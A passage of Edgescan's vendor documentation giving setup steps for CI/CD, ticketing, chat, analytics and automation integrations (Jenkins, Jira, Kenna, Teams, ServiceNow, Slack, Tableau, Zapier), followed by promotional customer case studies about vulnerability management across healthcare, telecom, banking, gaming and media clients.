jenkins Secure Your API Key Save your Edgescan API key as a “Secret text” entry in Jenkins Credentials. You can later extract that secret as an environment variable, ES_API_TOKEN, in your pipeline script. Configure Jenkins Pipeline From the web console, create a new Jenkins Pipeline job. In the Job Configuration settings, configure the Pipeline section to point to a Jenkinsfile in your code repository. Usually, this file would be in the root of your repository. Next, create a Jenkinsfile at the base of your code repository with the following contents: pipeline { agent any stages { stage ("Pull Edgescan Image") { steps { sh 'docker pull edgescan/cicd-integration' } } stage ("Run Edgescan Test") { environment { ES_API_TOKEN = credentials('ES_API_TOKEN'), ES_ASSET = 12345 } steps { sh ''' docker run -t \ -e ES_API_TOKEN=${ES_API_TOKEN} \ -e ES_ASSET=${ES_ASSET} \ -e WAIT=true \ edgescan/cicd-integration ''' } } } } Run It Check the Jenkinsfile into source control. Start your job from Jenkins, and watch the job run from Console Output. You should see your scan initiate, run, and print a summary of results. Also check your account at Edgescan to review your scan details CI/CD Documentation Excerpt: Jenkins is an open-source automation tool written in Java with plugins built for Continuous Integration purposes. It is used to continuously build and test your software projects, making it easier for developers to integrate changes to the project and easier for users to obtain a fresh build. It also allows you to continuously deliver your software by integrating with a large number of testing and deployment technologies. ### Jira Cloud How to Integrate with Edgescan: The edgescan plugin for Jira Cloud provides a means to link edgescan assets to Jira projects. It can be configured to retrieve vulnerability data from the edgescan API, open a Jira issue for each new vulnerability, and automatically transition issues when the linked vulnerability is closed. This documentation assumes familiarity with the concepts and configuration used by both edgescan and Jira. Installing the plugin The edgescan plugin installation URL is: edgescan Jira cloud plugin | Atlassian Marketplace The plugin can be installed by clicking Get it now. Select the site to install the app. Click Install app   When brought to another page click Get it now again.   Authorising the Plugin The host Jira instance must be authorised to access edgescan using an API token (See the edgescan user documentation for details on how to generate an API token). Once installed a pop-up will appear in the bottom left corner of the page. Select Configure. Alternatively, go to Apps -> Manage your apps and you can configure the app there. Enter the API token into the resulting field and click Save, and a message will be displayed indicating whether authorisation was successful. Linking Projects To configure a link between a Jira project and one or more edgescan assets: Navigate to the project link configuration page at: Project Settings -> Apps -> Link to edgescan and select Edit near the bottom of the page. The following configuration options are available: Linked Assets – The edgescan assets you wish to link to this project. You must select at least one Risk Mapping – Each edgescan risk rating may be mapped to a Jira priority. Issues created from a vulnerability with a particular risk rating will have the mapped priority. If a risk rating is set to Ignore, no issues will be created for vulnerabilities of that risk. Create Issue with Type – Issues created by the app will have this type. Add to Epic (Optional) – Issues will be added to the specified epic on creation. Add to Task – Issues created with type Subtask will be added to the specified task on creation. This option only appears if issues are created with type Subtask. Assign to (Optional) – Issues will be assigned to the specified user on creation. Status on Create – Issues will be transitioned to this status on creation. Status on Close – Issues will be transitioned to this status when the linked vulnerability is closed. For the plugin to operate correctly ensure that there is always a transition to this status available. Syncing Projects Syncing is the process of opening/transitioning issues based on the latest vulnerability data from edgescan. When a sync is performed, the app retrieves vulnerability data from edgescan. An issue will be opened for each new vulnerability, and if a vulnerability has been closed the linked issue will be transitioned to the configured Status on close. Syncing can be performed automatically or manually: Automatic Sync is disabled by default, and can be enabled by clicking the Enable Auto-Sync button on the project link configuration page. When enabled a sync will be performed automatically every 5 minutes. Manual Sync is only available if Auto-Sync is disabled. You can trigger a sync by clicking the Sync Now button on the project link configuration page. Created Issues Issues created by the plugin will have the type, priority, and status configured in the project link. Issues will be added to an epic and/or assigned to a user if configured to do so. The title is in the following format:  @ The description will list the details of the vulnerability, and provide a link to the vulnerability in the edgescan portal. Important Points about Syncing The first sync performed on a project may take a long time (depending on the number of issues it has to create). Similarly, if the project link configuration is edited, the next sync performed will be more thorough than the usual sync in order to ensure consistency between Jira and edgescan. Therefore, please allow 15 minutes for the first sync, and for subsequent configuration changes to take effect. The effect of changing each configuration option is as follows: If an asset associated with a link is deselected, any issues linked to vulnerabilities on that asset will be deleted. If the priority mapping for a risk is changed to Ignore, any issues linked to vulnerabilities of that risk rating will be deleted. If the priority mapping for a risk is changed, any issues linked to vulnerabilities of that risk rating will be updated to the correct priority. If the Create with type setting is changed, all issues will be updated to the correct type. If the Add to Epic, Add to Task, or Assign to settings are changed, existing issues will be unchanged. These changes will apply only to issues created in the future. If the Status on create or Status on close settings are changed, the status of already existing issues will be unchanged. These changes will apply only to issues created in the future. Excerpt: Jira Cloud is built for every member of your software team to plan, track, and manage their work. Using the Atlassian platform, you can dynamically show information about issues, build new workflows and features, or integrate Jira with an existing service. ### Kenna Security Get Kenna API Key: API Key Get Kenna Connector ID: 1. On the Kenna homepage select Connectors in the top navigation bar. 2. Select Add Connector. 3. Select the Kenna Data Importer 4. Name the Connector and set the asset inactivity limit. 6. Select the new connector, and record the connector ID. Get the Kenna Toolkit: The easiest way to get started is to use the pre-built image on Docker Hub. docker pull kennasecurity/toolkit It can also be built from source by cloning this repository. Run the Kenna Toolkit: There are 4 primary parameters to pass to the Kenna toolkit: task=edgescan edgescan_token='' kenna_api_key='' kenna_connector_id= Full list of parameters can be found below. Calling A Specific Task With Docker: docker run -it --rm toolkit:latest task=edgescan edgescan_token='es4p1t0k3n|12345' kenna_api_key='k3nna4p1k3y' kenna_connector_id=12345  Excerpt: Kenna automates the correlation of vulnerability data, threat data, and zero-day data, analyzing security vulnerabilities against active Internet breaches so that InfoSec teams can prioritize remediations and report on their overall risk posture. ### Microsoft Teams Setting up a workflow with Edgescan and MS Teams. With this integration, you can integrate Edgescan events into your existing workflow by using a Microsoft Teams channel webhook. In the following use case, a notification will be sent to the selected channel when a vulnerability is opened in Edgescan on any asset, and the risk is at least high. Two main steps need to be carried out to integrate MS Teams with Edgescan. Create an incoming webhook for the selected Teams channel. Create the Edgescan event to trigger the notification. Creating an incoming webhook for the selected Microsoft Teams channel To add an Incoming Webhook to a Teams channel Go to the channel where you want to add the webhook and select ••• More options from the top navigation bar. Select Connectors from the dropdown menu: 4. Search for Incoming Webhook and select Add. 5. Select Configure, provide a name, and upload an image for your webhook if required: 5. The dialogue window presents a unique URL that maps to the channel. Copy and save the webhook URL to send information to Microsoft Teams and select Done: The webhook is available in the Teams channel. Create the Edgescan event to trigger the notification Navigate to the Events page and select + Add event. Give the event a name, ie. Vulnerability is opened on any asset when risk is at least high. Fill out the required conditions for the event. 4. Activate Trigger a webhook. 5. Use the incoming Microsoft Teams webhook URL and select the Microsoft Teams payload. 6. Save and Test webhook. Excerpt: Microsoft Teams is a unified communication and collaboration platform that combines persistent workplace chat, video meetings, file storage (including collaboration on files), and application integration. This integration allows for the triggering of notification in relation to the following ### RiskSense How to Integrate with Edgescan: RiskSense Connector Documentation Excerpt: RiskSense prioritizes vulnerabilities from CVEs and CWEs, and their trending threat context. This new approach delivers a common way to express risk exposure across infrastructure and applications. ### ServiceNow Webhooks and ServiceNow Incidents A Webhook is an HTTP request that is triggered when an event occurs. The event Webhooks allow you to send edgescan data to other applications. An event is an unplanned security-related interruption that has occurred in your organisation. This is reported in ServiceNow via an event, ITSM incident, or security incident. Before setting up the integration, check with your ServiceNow account manager that your organisation has a subscription for Event Management. To create security incidents in ServiceNow this plugin is required. Create a ServiceNow Authentication Header Retrieve your Service Now username and password. In order to use basic authentication details in the header you must encode the username and password. If the username is Patrick and the password is Security123 then base64 encode them using the command: echo -n "Patrick:Security123" | base64 The result is UGF0cmljazpTZWN1cml0eTEyMw==, then the authentication header will be: Authorization:Basic UGF0cmljazpTZWN1cml0eTEyMw== Setup ServiceNow Event Webhook On edgescan navigate to the events page by going to Account/Settings -> Events. Create a new event and give it an appropriate name. In the first drop down select the event you want e.g. vulnerability opened. Enable the Trigger a webhook event. Enter the URL for the required ServiceNow table endpoint, usually: Event: https://.service-now.com/api/now/table/em_event ITSM Incident: https://.service-now.com/api/now/table/incident Security Incident: https://.service-now.com/api/now/table/sn_si_incident Ensure the HTTP method is POST. Add the authentication header from the above section. Select the correct payload to match the endpoint entered: JSON – ServiceNow: Event JSON – ServiceNow: Incident JSON – ServiceNow: Security Incident The ‘Send a separate request for each item’ checkbox will create a new Security Incident ticket for each vulnerability when checked, otherwise it will create one ticket with many vulnerability details. Save the event, and you’re all set up! You can test that it is working by using the Test -> Notification button in the top right ### Slack Setting up a workflow with Edgescan and Slack With this integration, you can integrate Edgescan into your existing workflow by using a slack channel webhook. In the following use case, a notification will be sent to the selected channel when a vulnerability is opened in Edgescan on any asset, and the risk is at least high. Two main steps need to be carried out to integrate with Edgescan. Create an incoming webhook for the selected channel. Create the Edgescan event to trigger the notification. Creating an incoming webhook for the selected Slack channel Create a new Slack app in the workspace where you want to post messages. 2. From the Features page, toggle Activate incoming webhooks on. 3. Click Add new webhook to workspace at the bottom of the page. 4. Pick a channel that the app will post to, then click Authorise. 5. Use your incoming webhook URL to post a message. Create the Edgescan event to trigger the notification 1. Navigate to the Events page and select + Add Event. 2. Give the Event a name, ie. Vulnerability opened on any asset when risk is at least high. 3. Fill out the required conditions for the event. 4. Activate Trigger a webhook. 5. Use the incoming webhook URL and select the payload. 6. Save and Test webhook. Excerpt: Slack is a proprietary business communication platform developed by American software company Slack Technologies and now owned by Salesforce. It offers many IRC-style features, including persistent chat rooms organized by topic, private groups, and direct messaging. ### Tableau How to Connect to Edgescan’s Web Data Connector Edgescan’s Web Data Connector (WDC) allows you to retrieve Asset, Assessment, and Vulnerability information in Tableau. Requirements: Tableau Edgescan API Key Edgescan Web Data Connector URL: https://connector.edgescan.com/tableau To use Edgescan’s WDC in Tableau, complete the following steps: 1. On the start page, in the Connect pane, click More Servers… > Web Data Connector. 2. Enter the Edgescan WDC URL (https://connector.edgescan.com/tableau), and press Enter. 3. Tableau will load the WDC page where you can input the required filter, and your Edgescan API key 4. Tableau will interact with the WDC and display the data available for retrieval in the Data Source pane. 5. Select the Table you want, Assets, Assessments, or Vulnerabilities, and hit the Update Now button. This may take a minute or 2 depending on the amount of data. Tableau Documentation – Use a WDC in Tableau Desktop Tableau Documentation – Use a WDC in Tableau Server Excerpt: Tableau can help anyone see and understand their data. Connect to almost any database, drag and drop to create visualizations, and share with a click. ### Zapier How to Integrate Edgescan & Zapier. Part One: Set up a webhook-triggered Zap Go to My Zaps and click on “Create Zap”: Search for “Webhook” and select “Catch Hook” as the Trigger Event: Click “Continue”. Copy your new webhook’s URL: Part Two: Set up an Edgescan event to trigger that Zap Go to your events page on Edgescan and click on “Add event”: In this example we’ll trigger our Zap when an assessment completes – but feel free to set up the event you need to automate your workflow. Once you’ve done that, click the “Trigger a webhook” toggle: Paste in the URL that Zapier provided you in the previous step: The rest of the values can be left unchanged. Press the “Save” button: Edgescan will now notify your Zap every time an assessment has completed. Part Three: Add an action to your Zap to automate your workflow We’ll leave this part up to you! If you’ve had trouble along the way, feel free to shout@edgescan.com. Excerpt: Zapier is a tool that helps you automate repetitive tasks between two or more apps—no code necessary. When an event happens in one app, Zapier can tell another app to perform (or do) a particular action. ## Case Studies ### A Firm Specializing in Mergers and Acquisitions A global enterprise with a core strategy focused on acquiring smaller competitors enlists Edgescan to assess the security profile of new assets before they’re accepted into the corporate network.   About the Client One of the largest clinical research organizations (CROs) in the world is engaged in a long-term growth strategy focused on acquiring other businesses in the sector. This presents a rolling series of challenges for the internal security team: “How do we know what state the IT assets are in without performing due diligence on them prior to acquisition?” For the team, penetration testing every IP range and application scheduled to enter the parent network after a firm’s acquisition was virtually impossible, and identifying all of these disparate assets and their owners to get visibility into their risk controls and metrics was in many cases unrealistic. So they called Edgescan.   About Edgescan Edgescan offers a continuous security testing and unified exposure management SaaS platform that manages thousands of assets across the globe for both enterprise and SME clients, helping them to continuously detect, prioritize, monitor, and fix security weaknesses for all web-facing and internal systems including web applications, websites, mobile apps, servers, firewalls, VPNs, or VoIP services. A team of analysts validates every vulnerability discovered on an assessment, creating a multi-step verification process for a solution that’s highly accurate and virtually free of false positives.   Onboarding Edgescan swiftly and seamlessly integrated with the client’s information security apparatus to harden the attack surface of the core network. Next, when the client moves to make an acquisition, Edgescan onboards all assets associated with the target company—websites, mobile applications, VPNs and more—and begins the program of continuous attack surface management (ASM) for each asset before it enters the network.   Perimeter Defense Edgescan provides authenticated assessment of attack-surface vulnerabilities on an ongoing basis for all web-facing assets under management. All of the vulnerabilities discovered are manually validated and risk-rated, helping the client focus on issues that pose priority risk. The client can channel this validated vulnerability intelligence into their own security systems through the Edgescan API and instantly operationalize it, using Edgescan’s insights to establish a more secure perimeter around their core network. When the client makes an acquisition, web-facing assets associated with it are scrutinized for risk and vulnerabilities while still outside the perimeter, before they’re accepted into the corporate network, in order to maintain the client’s overall security posture.   Outcome Edgescan’s full-stack vulnerability management service has enabled the client to implement a defined and standardized process around accepting external assets into the secure network. This process has been streamlined and automated into the existing security ecosystem of the organization, saving time and money. In this case, Edgescan’s capabilities directly serve the major strategic goals of a global business, allowing leadership to execute a high-level tactical plan while maintaining full command of their web-facing security posture. ### A Partnership to Safely Build a Justice System’s Codebase An Edgescan partner called in the vulnerability-management solution to provide another level of security for a coding project underway within a critical area of a correctional system.   About the Client The governing board for a nation’s youth justice system was engaged in a large-scale programming project to develop an online platform for managing the documents and other casework associated with individuals enrolled in the system. Considering the nature of the information—criminal records, psychological evaluations, and other personal data for minors and individuals under 21 years of age—security was paramount. So the board’s leadership approached an Edgescan partner, Securestorm (now known as Falanx Cyber) to safely manage the development process. Securestorm provided the initial layers of testing, but when a section of code reached a level of maturity, it was moved to a cloud-based user-training environment that was web-facing. The team at Securestorm identified Edgescan’s vulnerability management solution as the ideal partner to handle risk management, information assurance, and operational security for this stage of the process.   About Edgescan Edgescan offers a continuous security testing and unified exposure management SaaS platform that manages thousands of assets across the globe for both enterprise and SME clients, helping them to continuously detect, prioritize, monitor, and fix security weaknesses for all web-facing and internal systems including web applications, websites, mobile apps, servers, firewalls, VPNs, or VoIP services. A team of analysts validates every vulnerability discovered on an assessment, creating a multi-step verification process for a solution that’s highly accurate and virtually free of false positives.   Onboarding The justice system’s web-facing platform was configured with a representative set of accounts that were made accessible to Edgescan to test new code blocks from a variety of angles through multiple theoretical end users. The solution then went to work scanning the web-facing applications on a schedule matched to the internal development team’s sprint cycles, and the output reports were shared with the team for remediation as the development process continued.   Three Levels of Cooperative Security Edgescan formed part of a three-level security testing and assurance model managed by Securestorm throughout the development process. As the code was written and committed within the Jenkins open-source toolset, Securestorm tested the additions against OWASP standards using a plugin. This allowed the development team to fix issues while still working on the code. When the code reached a level of maturity after clearing the initial security tests, it was moved to a cloud environment for user training and testing purposes. Edgescan entered the equation here, when each piece of the client’s platform became web-facing, to provide a second level of security testing. The rolling scans and penetration testing that define the Edgescan solution continually produced specific guidance around potentially problematic sections of code so that developers could remediate them as the development process unfolded, without disrupting or delaying each sprint. When the code reached a final level of maturity, it was moved to the production environment and made subject to a targeted government penetration test.   Outcome Edgescan entered a partnership to help the youth justice system governing board’s internal development team ensure the code they produced could be safely transitioned into a web-facing environment. Within Securestorm’s management of the overall security protocol, the Edgescan solution played a decisive role in providing timely and targeted assessments that allowed the development team to address issues during sprints. The continual scans and testing allowed the internal team to make these security adjustments without delaying the larger process or product rollouts, and without the need for a major penetration test at the end of the development lifecycle. The developers were particularly impressed with the specificity of Edgescan’s reports around the impacted code, which enabled them to review the flagged security gaps and address the issues within the process rather than months later. The governing board’s leadership was pleased that security issues and potential risks were addressed as part of the development lifecycle, and held high confidence that Edgescan’s security-testing model had a significant positive impact on the developed application code. The Edgescan solution helped the governing board create a platform that allowed new coordination and knowledge-sharing within their workforce for the benefit of young people and the rehabilitation process, safeguarding underage citizens’ highly sensitive information in a web-facing environment. ### A Major Health Insurance Provider A midsize European nation’s largest health-insurance provider tapped Edgescan to streamline its penetration-testing practices with an eye on eliminating inefficiencies, automating their reporting processes, and gaining new visibility into security gaps in the attack surface.   About the Client With roughly 2,500 employees across four branch offices and several sites, the company came to Edgescan with significant challenges around securing their systems, which include large-scale databases of sensitive patient records, financial data from hospitals and other facilities, and the firm’s own proprietary information. This insurance provider’s internal security team sought a new solution for penetration testing, as its existing practices were burdened by a procurement process that created significant delays, ate up the security team’s time, and left visibility gaps. The team also wanted to automate their processes: prior to enlisting Edgescan, each quarterly pentest required security analysts to manually collate the results and log the findings onto a management platform to remediate them. Reports from different providers were received in PDF format, which made it harder for the insurance provider to compare metrics and build an efficient remediation pipeline.   About Edgescan The Edgescan Platform features Penetration Testing as a Service (PTaaS), a hybrid solution that combines the breadth of automation with the depth of human assessment. As part of the platform’s Exposure Management Security as a Service (SaaS), the solution is integrated with advanced vulnerability management and cyber analytics to automatically validate risk, then rate that risk against a suite of threat feeds to prioritize remediation. PTaaS can be used for web application security, APIs, cloud assets, network devices, and more.   Onboarding The insurance provider’s security team furnished Edgescan with account credentials and some key details about their systems. Then they sat back and watched as the platform was swiftly and seamlessly integrated into their operations. With the vision this provided into the firm’s wider network, Edgescan immediately began to monitor the full stack for any and all changes in the security environment and flag them in real time, including unapproved adjustments to user profiles, permissions, or protocols. Concurrently, the firm’s internal team gained access to the intuitive Edgescan dashboard as a base of operations for their security approach.   The PTaaS Difference The unique intelligence behind the hybrid penetration-testing solution comes from a battle-hardened team of security experts with industry accreditations such as CREST, OSCP, and CEH. Their deep experience provides critical insight that dovetails neatly with the breadth and scope of the platform’s automated penetration testing services, which also yield an array of actionable analytics. This is where the Edgescan advantage comes into play. PTaaS helps organizations better manage security risks, mitigate data breaches, and assure safe-business continuity. Delivered as a service to offer greater scale, agility, and risk awareness, this type of assessment is essential for maintaining compliance with industry regulations and building top-of-the-line security frameworks.   Outcome The firm’s approach to penetration testing was immediately streamlined, replacing a cumbersome process of onboarding testers on quarterly cycles—and manually assembling their findings—with Edgescan’s comprehensive service. The in-house security team gained “real visibility into previous gaps in [their] ability to secure systems” and huge improvements in reporting as they moved from manually gathering data to a fully automated and integrated approach. This enabled the team to make use of detailed metrics as they built an effective remediation pipeline to address vulnerabilities as they were identified. Combined with dramatically increased visibility into the attack surface, this yielded a vastly improved mean time to remediate (MTTR). The insurance provider successfully met security and compliance requirements and honored its commitment to protect customers’ sensitive data. ### A U.S.-Based Telecom Manufacturer and Operator This firm sought vulnerability management as a service to maintain a secure posture across 450 web applications and 12,000+ IP servers, hardening the attack surface for internet and mobile infrastructure and safeguarding a vast pool of confidential information.   About the Client This telecommunications manufacturer and operator based in the United States manages 450 web applications and over 12,000 IP servers distributed across the globe. The security of these systems is of critical importance, with the continuity of mobile and internet communications at risk along with the firm’s own confidential information, the personal and financial data of its customers, and material considered sensitive by the U.S. federal government. The client seeks a continuous assessment of its global web-facing assets in order to detect current security issues and maintain a secure posture as threats evolve over time. The firm’s information security leadership prefers a list of actionable findings, free of false positives, which they can then assign for remediation in order of priority using the Edgescan Platform’s insights into which vulnerabilities carry the most critical risk.   About Edgescan Edgescan offers a continuous security testing and unified exposure management SaaS platform that manages thousands of assets across the globe for both enterprise and SME clients, helping them to continuously detect, prioritize, monitor, and fix security weaknesses for all web-facing and internal systems including web applications, websites, mobile apps, servers, firewalls, VPNs, or VoIP services. A team of analysts validates every vulnerability discovered on an assessment, creating a multi-step verification process for a solution that’s highly accurate and virtually free of false positives.   Onboarding Edgescan swiftly and seamlessly integrated with the client’s information security apparatus to harden the attack surface of the core network, proceeding to validate each site and server for security and importance. The internal team was set up with an API plug-in to the Edgescan dashboard, where they could access the results and send flagged issues into their remediation process. Once an application is onboarded, technical assessment can commence and the application is subject to re-assessment on an ongoing basis.   Critical Security Priorities The Edgescan solution is a complete assessment of the global attack surface, with security gaps flagged according to the level of risk—from critical to informational—that each one poses to the firm’s systems. The Edgescan difference is a hybrid approach that combines the breadth of automation with the depth of human assessment, leaning on a battle-hardened team of security experts with industry accreditations such as CREST, OSCP, and CEH. Each potential issue is verified in a multi-step process to maximize accuracy and virtually eliminate false positives.   Outcome Within the first 7 days, Edgescan discovered, validated, and exposed 233 high-risk issues. All of the vulnerabilities discovered were manually confirmed, helping the client focus on issues which cause real risk. Edgescan monitored the remediation process to ensure flagged issues were properly resolved. Assessments of the attack surface then continued on both a scheduled and an ad-hoc basis. The client could request an assessment at any time to retest for vulnerabilities in any region of their sprawling web-facing assets. Edgescan’s multi-layered solution helped to secure the security posture of this global enterprise at a time where the challenge has only increased with the growth of cloud and social networking. For many firms, securing customer and enterprise data is a top priority, but in this case, the security of worldwide communications networks is also of vital macroeconomic, social, and geopolitical importance. The Edgescan Platform played its part. ### A Healthcare Pharmaceutical Firm In a highly regulated industry, maintaining proper security posture while acquiring other firms and their portfolios of web-facing assets requires best-in-class vulnerability management.   About the Client This multinational healthcare pharmaceutical firm operates in a highly regulated sector due to the security and compliance demands associated with safeguarding patient information and confidential business records, including clinical trial data and documentation for new products seeking patent approval. Proactive management of the web-facing systems supporting this data is of critical importance to the future success of this enterprise, and the company came to Edgescan seeking complete and integrated full-stack application security and vulnerability management. As a prime player in this industry, the firm regularly acquires smaller competitors and sought Edgescan’s help to ensure that no web-facing assets with substandard security controls would be accepted into the secure network following an acquisition. The enterprise’s leadership also sought full integration of the service into their existing information-security apparatus; a tool to patch vulnerabilities in older legacy assets for which they lacked access to the source code; and on-demand reporting features they could leverage to maintain full compliance with government regulations.   About Edgescan Edgescan offers a continuous security testing and unified exposure management SaaS platform that manages thousands of assets across the globe for both enterprise and SME clients, helping them to continuously detect, prioritize, monitor, and fix security weaknesses for all web-facing and internal systems including web applications, websites, mobile apps, servers, firewalls, VPNs, or VoIP services. A team of analysts validates every vulnerability discovered on an assessment, creating a multi-step verification process for a solution that’s highly accurate and virtually free of false positives.   Onboarding Edgescan swiftly and seamlessly integrated with the client’s internal security operations to harden the attack surface of the core network. The platform immediately went to work identifying potential vulnerabilities and flagging them in the Edgescan dashboard for the internal security team to review. When complex security challenges arose, the Edgescan team helped the client develop bespoke solutions. When the client moved to make an acquisition, Edgescan onboarded all assets associated with the target company—websites, mobile applications, VPNs and more—to begin the program of continuous attack-surface management (ASM) for each asset before it entered the network.   Custom-tailored Solutions The client’s information-security leadership had specific needs tied to the regulatory demands of the industry and the nature of their attack surface. When Edgescan’s solution identified vulnerabilities in some older legacy systems that the firm was operating, the internal security team lacked access to the source code necessary to address the issues. Edgescan supplied automatic Web Application Firewall (WAF) rule generation to help them virtually patch those security gaps by other means. The firm also had significant requirements around on-demand testing to supplement Edgescan’s rolling vulnerability assessments. They leveraged ad-hoc scans and penetration testing as required to be sure a previously discovered vulnerability had been fixed properly. This on-demand reporting capability is vital given the frequency of security audits that occur within this industry, and this agile posture was key to Edgescan’s role in the firm’s ISO/IEC 27001:2013 compliance efforts. The enterprise sought a solution that could incorporate all this into a larger approach facilitating the speedy and safe onboarding of new web-facing applications following the acquisition of market competitors.   Outcome Edgescan’s full-stack vulnerability management helped this healthcare pharmaceutical enterprise harden its attack surface and maintain compliance in a highly regulated industry where acquiring smaller competitors is core to the firm’s approach. The platform enabled the firm’s internal security team to swiftly identify and remediate vulnerabilities thanks to Edgescan’s comprehensive integration capabilities, and they leveraged Edgescan’s bespoke solutions to address specific challenges created by legacy systems and a demanding regulatory framework. The platform enabled the firm to approach its acquisitions strategy with full confidence that a defined process was in place for rogue-asset acceptance into the core secure network, that this process was streamlined and automated into the existing security ecosystem of the organization, and that it aligns with the continuous improvement philosophy of the global information security program. This approach to providing deep vulnerability intelligence on all new digital assets acquired by the enterprise ultimately saves time and money while allowing the firm to maintain full control over the web-facing security posture. ### An Online Gaming Company With 100+ web-facing applications in deployment, this firm required continuous, authenticated assessment of a sprawling global attack surface.   About the Client This enterprise carries a high level of threat exposure by nature: its products and services are delivered entirely online in a rolling user experience via dozens of web-facing applications that together make for a varied and intricate attack surface. The client’s internal security team sought a vulnerability management service that would yield a list of actionable findings, free of false positives, which they could assign and remedy internally. Once security gaps were addressed, the firm required regular assessment of the adjusted security posture as well as retest-on-demand capability. The security team also sought a specific authenticated assessment that could simulate an attacker with valid credentials attempting a security breach on both desktop and mobile web applications.   About Edgescan Edgescan offers a continuous security testing and unified exposure management SaaS platform that manages thousands of assets across the globe for both enterprise and SME clients, helping them to continuously detect, prioritize, monitor, and fix security weaknesses for all web-facing and internal systems including web applications, websites, mobile apps, servers, firewalls, VPNs, or VoIP services. A team of analysts validates every vulnerability discovered on an assessment, creating a multi-step verification process for a solution that’s highly accurate and virtually free of false positives. With Penetration Testing as a Service (PTaaS), Edgescan probes and challenges the attack surface of the client’s assets with both the breadth of automation and the focused depth of expert human testers.   Onboarding The client was set up with API and Jira plug-ins in order to directly integrate Edgescan’s verified vulnerability data into their own systems, accessed through a dashboard that doubles as a base of operations for their updated security plan. Then Edgescan went to work, rating each web-facing application for vulnerability and systemic importance to deliver risk-rated findings on where the firm’s most critical security gaps were identified, at which point the internal team could begin the remediation process for those threats on a priority basis.   Test and Retest With this challenging exposure profile, the attack surface requires constant monitoring with authenticated vulnerability assessment for the 100+ web applications under management. This includes Penetration Testing as a Service (PTaaS), a hybrid solution that combines the breadth of automation with the depth of human assessment from a battle-hardened team of security experts with industry accreditations such as CREST, OSCP, and CEH. Their deep experience provides critical insight that dovetails neatly with the breadth and scope of the platform’s automated penetration-testing services. Integrated with Edgescan’s advanced vulnerability management service, this system can automatically validate risk, then rate those threats against a suite of risk databases to prioritize remediation and ensure critical exposures are addressed first. Assessments occur on both a scheduled and an ad-hoc basis, as required by the client.   Outcome Within the first seven days, Edgescan discovered and validated 55 high-risk vulnerabilities, publishing them in the dashboard for the client’s review. The internal security team then addressed those security gaps over the coming months, and in each case, Edgecan verified the effectiveness of the firm’s remediation tactics. With a new security posture in place and continuous re-assessments of the web-facing assets underway, the client could have new confidence in the hardiness of the expansive attack surface and request a specific re-assessment of any and all assets’ vulnerabilities at any time in the interest of maintaining that secure posture. ### A Global Banking Institution Seeks Greater API Security The growth of openbanking and PSD2 compliance has changed the face of API security for banks. The client sought help to reduce API security risk efficiently, and maintain more accurate reporting.   About the Client This global banking institution faced issues with managing and deploying API services in order to support rapid expansion and diversification of their business. Open banking, where financial institutions grant third-party service providers access to customers’ personal information and transaction data to network their accounts across multiple institutions, relies heavily on APIs. This paradigm is driving major innovation in the financial-services industry, but the uncontrolled deployment of APIs can give rise to security blind spots and vulnerable endpoints that can be exploited by bad actors. According to the 2024 Data Breach Investigations Report (DBIR) by Verizon, 90% of web-application attacks target APIs. The firm’s information-security leadership found themselves in a position where they were unable to scope how many APIs had been deployed, and some of those pathways could not be maintained and regularly assessed for vulnerabilities. As a direct route to sensitive business and consumer data, APIs are also a particular focus of the European Union’s Payment Services Directive 2 (PSD2), with which the firm sought to come in full and proper compliance.   About Edgescan Edgescan offers a continuous security testing and unified exposure management SaaS platform that manages thousands of assets across the globe for both enterprise and SME clients, helping them to continuously detect, prioritize, monitor, and fix security weaknesses for all web-facing and internal systems including web applications, websites, mobile apps, servers, firewalls, VPNs, or VoIP services. A team of analysts validates every vulnerability discovered on an assessment, creating a multi-step verification process for a solution that’s highly accurate and virtually free of false positives. Edgescan’s API Security Testing enables firms to identify API vulnerabilities across their known network of web-facing assets. The platform also discovers rogue APIs across your cloud providers (AWS, Microsoft Azure, GCP, VMware NSX, and Cisco ACI), tracks them, and flags issues in the Edgescan dashboard for the internal security team’s review and potential remediation.   The API Challenge 90% of web application attacks target APIs, and deployment data from Edgescan customers reveals a 320% rise in API vulnerability in 2022—a severe warning to organizations of all types about the scale of this challenge. It can be difficult to discover unknown or lost APIs, as they are “headless” and don’t have a website or other obvious indicators that they exist. Many APIs are only discoverable if you interact with the endpoint in the correct manner. If we can’t easily find and track deployed APIs, how can we secure them? Using multi-layer probing technology, the Edgescan API discovery engine utilizes asynchronous port scanning to identify and then monitor network changes. It automatically discovers active API endpoints across your entire attack surface and flags them for remediation.   Outcome Edgescan’s comprehensive API security testing helped discover hidden and rogue APIs across the client’s web-facing assets and cloud providers. The multi-step verification process applied to each potential issue ensured that the threat information received by the internal security team was free of false positives and risk-rated. They could then proceed with their remediation approach in confidence that their order of operations would be maximized for efficiency. By helping to secure the bank’s network of APIs, the Edgescan Platform hardened a crucial element of the institution’s attack surface and provided continual monitoring of one of the most commonly exploited security gaps today. The enterprise could now promise customers top-notch security for their personal and financial information in the contemporary landscape, and the internal security team could better ensure the firm’s security posture was in full compliance with government rules and regulations on transaction data. ### A Major Multinational Media and Entertainment Company Edgescan demonstrates its Web Application Security Testing solution can operate with unrivaled precision at massive scale.   About the Client The enterprise is a leading diversified global entertainment and media conglomerate with subsidiaries and affiliates spread across content production and distribution, live experiences, and assorted international holdings. This client was seeking a new solution to scale their Application Security Testing (AST) program to cover 5,000 web applications across all of their corporate entities after existing solutions simply could not scale to the required level without sacrificing quality.   About Edgescan Edgescan offers a continuous security testing and unified exposure management SaaS platform that manages thousands of assets across the globe for both enterprise and SME clients, helping them to continuously detect, prioritize, monitor, and fix security weaknesses for all web-facing and internal systems including web applications, websites, mobile apps, servers, firewalls, VPNs, or VoIP services. A team of analysts validates every vulnerability discovered on an assessment, creating a multi-step verification process for a solution that’s highly accurate and virtually free of false positives.   Onboarding Edgescan quickly established a baseline security posture for all 5,000 web applications across all business units. Within 24 hours, 500 websites were onboarded, a process that can take weeks or months with other solutions. Within one month, Edgescan demonstrated that it could provide threat-detection accuracy at massive scale, and continued to do so as the client enterprise steadily grew and expanded its portfolio of applications that require scanning and monitoring. The solution continued to provide accuracy under increased loads. In fact, Edgescan’s capacity exceeded the input requirements that this major multinational firm placed on the platform. Previously, the client had been unable to find a solution to handle the extremely large volume of throughput required for its business.   Continuous Assessment Following the successful implementation of the Web Application Security Testing solution, the client chose to expand their Edgescan Platform service to include Penetration Testing as a Service (PTaaS). With a security perimeter established, the enterprise’s internal Security Team now wanted to probe their vulnerabilities from all angles on a rolling basis. Again due to the size of the firm, they’d struggled to secure penetration testing that was reliable at the required scale, even when they engaged the services of other third-party contractors. Armed with intelligence secured from the DAST solution, Edgescan began to rank each of the enterprise’s systems in coordination with the client, promoting those that were of core 